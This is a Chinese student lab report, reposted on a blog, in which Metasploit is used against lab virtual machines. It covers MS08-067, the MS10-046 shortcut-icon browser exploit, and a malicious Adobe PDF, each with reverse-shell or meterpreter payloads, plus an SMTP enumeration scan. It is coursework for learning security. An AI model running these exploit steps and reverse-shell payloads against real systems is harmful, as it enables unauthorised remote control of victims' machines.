# 2018-2019-2 20165115 《网络攻防》 Exp5 MSF基础应用 #

2018-2019-2 20165115 《网络攻防》 Exp5 MSF基础应用

目录

  • 一、知识点回顾与问题回答
  • 二、实验步骤
    • 主动攻击实践 ms08_067
    • 针对浏览器的攻击 ms10_046
    • adobe相关渗透模块 adobe_toolbutton
    • 辅助模块的使用 通过auxiliary/scanner/smtp/smtp_enum批量扫描主机中是否有开放的端口(特殊)
  • 三、实验中遇到的问题与解决方法
  • 四、实验总结

一、知识点回顾与问题回答

  • 1.用自己的话解释什么是 exploit , payload , encode.
    • exploit: 设相当于利用漏洞偷偷打开的管道,将做好的木马病毒等顺利传输到靶机。

    • payload: 简单来说就是病毒代码包装成一个可执行的文件,或者包装成指定的类型,然后通过管道传输进去后开始为我们控制靶机服务。

    • encode: 针对payload进行编码,就是对它进行包装打扮,改变payload代码特征,但是不改变payload为我们所用的特征,但能对payload进行加工。

二、实验步骤

1.主动攻击实践——MS08_67

1.1 漏洞信息简介
  • 名称: MS08-067 Microsoft Server Service Relative
  • 路径: exploit/windows/smb/ms08_067_netapi
  • 使用平台:Windows XP SP2 英文版、
  • 工作原理(查询到的):其原理在于exploit模块通过建立TCP连接后进行SMB空会话连接,通过SMB空回话连接自动查询目标系统的各种信息。再构造恶意数据,数据的核心仍然是覆盖ESI寄存器中指向栈空间的地址,并通过SVCHOST.EXE中的JMP指令进行跳转,最终执行shellcode
1.2 攻击过程实践
  • 关闭防火墙,检测主机连接情况;
    1322852-20190413124907628-541685540.jpg

  • 进入MSFconsole,可以先通过search与info指令对完整路径进行查询;
    1322852-20190413124931948-856584299.jpg
    1322852-20190413125038046-1044429507.jpg

  • 查看可供选择的payload并进行设置set payload generic/shell_reverse_tcp
    1322852-20190413125057742-1366262587.jpg

  • 设置LHOST、LPORT与RHOST三个参数,设置完成后即可运行获取被控主机的shell
    1322852-20190413125103983-1840318049.jpg

2. 浏览器攻击实践——MS10_046

2.1 漏洞信息简介

1322852-20190413125400850-144756354.jpg

  • 工作原理:该漏洞的原理在于由于MS10-046的漏洞是在shell32.dll当中,windows出于美化的目的,会现实快捷方式的图标,这个图标可能是程序本身自带的ico,也可能是系统默认的那些图标,对于一个快捷方式,系统会对它进行解析从而获取他要显示的那个图标,但是在解析的时候没有做好参数验证工作。如果被攻击者显示特指的快捷方式图标或者使用特制的共享时,则该漏洞可能允许远程执行代码。成功利用漏洞的攻击者可以获得与本地用户相同的用户权限
2.2 攻击过程实践
  • 通过back指令回到MSF指令界面,输入use windows/browser/ms10_046_shortcut_icon_dllloader

  • 使用show payloads查看可选的payload

  • 使用set payload windows/meterpreter/reverse_tcp选择payload,设置LHOST为攻击机的IP地址;

  • 执行完成后会生成一个url链接,在被控机当中打开这个链接,在kali中就可以发现已经被控制并出现了session;
    1322852-20190413125449175-454745046.jpg

  • 使用sessions -i 1运行,就能获取被控主机的shell
    1322852-20190413125501831-327506926.jpg

3. Adobe渗透测试

3.1 实践过程
  • back指令回到主界面,输入use windows/fileformat/adobe_cooltype_sing

  • 选择连接payload,设置LHOST、LPORT与生成文件的名字;
    1322852-20190413125601731-181836070.jpg

  • 将生成的pdf文件拷贝到靶机中并运行
    1322852-20190413125549436-1498164998.jpg

  • 进入监听模块,设置LHOST LPORT并进行攻击

  • 打开靶机当中的文件,回到kali中就可以看到攻击成功
    1322852-20190413125542193-756895201.png

4、辅助模块的使用

  • 使用use auxiliary/scanner/smtp/smtp_enum指令,这是一个扫描并列举出smtp开放端口的模块。use后设置参数,可以看出批量扫描的主机中并没有开放的端口。
    1322852-20190413125615540-597725721.jpg

三、实验中遇到的问题与解决方法

在进行Adobe渗透测试的时候,第一次找到的Adobe Reader版本不太对,导致了前几次的攻击都失败了。后来是去找成功的同学拷贝了他们的Adobe Reader才完成了Adobe的渗透攻击。

四、实验总结

本次试验给我最深的感触就是msf的强大,活用msf真的能够在渗透测试或者以攻击为目的的行为给予很大帮助。并且为了防止被攻击,不仅仅对传统的恶意软件进行防范,还要加强对一些像不明来路的pdf文件的防范。

转载于:https://www.cnblogs.com/zcy20165115/p/10700716.html

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值